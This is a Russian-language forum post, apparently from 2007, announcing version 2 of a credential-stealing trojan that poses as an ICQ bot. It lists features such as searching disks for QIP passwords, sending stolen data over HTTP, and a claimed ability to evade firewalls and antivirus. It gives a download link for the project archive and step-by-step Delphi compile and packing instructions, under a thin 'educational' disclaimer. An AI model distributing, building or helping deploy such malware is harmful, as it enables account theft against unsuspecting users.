ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

16.02.2007, 01:47
|
|
Участник форума
Провел на форуме: 1537850
|
|
Релиз ICQ трояна. ver 2
Итак, приступим. Если кто то постоянно тoрчит на Античате и у него хорошая память, то он помнит что гдето месяца полтора назад я выкладывал троянца, который маскируется под ICQ Бота, а на самом деле ворует пароли (очень нехороший =( ). Примерно в воскресенье я сел с утра и начал писать вторую версию. Закончил я это дело в понедельник =). Эти дни я давал троянца на проверку разным хорошим пиплам, чтобы они нашли и сообщили мне о глюках =), теперь же я выкладываю официальную (гыгы) вторую версию троянца. Нового оччень много, но обо всем попорядку. Что добавлено/исправлено:
- Добавлен поиск по винту НЕУСТАНОВЛЕННОГО QIP.
- Исправлены глючки с процедурой извлечения паролей (они были и во множетсве = ) ).
- Кардинально изменен способ передачи данных. Теперь троян использует не ICQ протокол, а HTTP, а еще конкретнее библиотеку WinInet. Не палится файерами (вроде бы =) ). Антивирями тоже не палится.
- Соответственно, если передача теперь по HTTP, То для троя был написан сниффер (его исходник в проекте).
- Написан подробный ReadMe.txt =))))
Обращаю внимание, что программа написана в ОБРАЗОВАТЕЛЬНЫХ целях, не стоит реально украдывать ею аськи!!!!
Архив с проектом качаем тутс:
http://ggg123321.narod.ru/troy.rar
Теперб к вопросам компиляции, после релиза первого трояна ICQ и еще одного моего троянца, мою личку зафлудили вопросами о компиляции =))). Объясняю все и всем сразу =). Ничего сложного нет!!! С проектом идет компонент TICQ2003Decrypt (автор не я, автор CobanS), его нужно установить. Далее нужно нажать ctrl-f9, чтобы Делфи скомпилировал троянца без запуска! Дальше можно оптимизировать размер каким нето пакером, но и то это будет приятное, но не обязательное дополнение. ВСЕ!!!!! Это не сложно!!!!! Если же совсем туго, то можно спросить в теме. Это не стыдно, форум для того и создан чтобы делится опытом и знаниями! Потом, у меня перебои с инетом, и я могу ответить не сразу, а в теме же это сделают пусть и дургие люди но оперативно!
Авторские права принадлежат прежде всего Antichat.Ru, ну и вашему покорному слуге - А®ТеS'y.
Вы можете модифироваь код, это только приветствуется, единственное чего вы не имеет права делать, это КОММЕРЧСКИ распространять программу.
|
|
|
|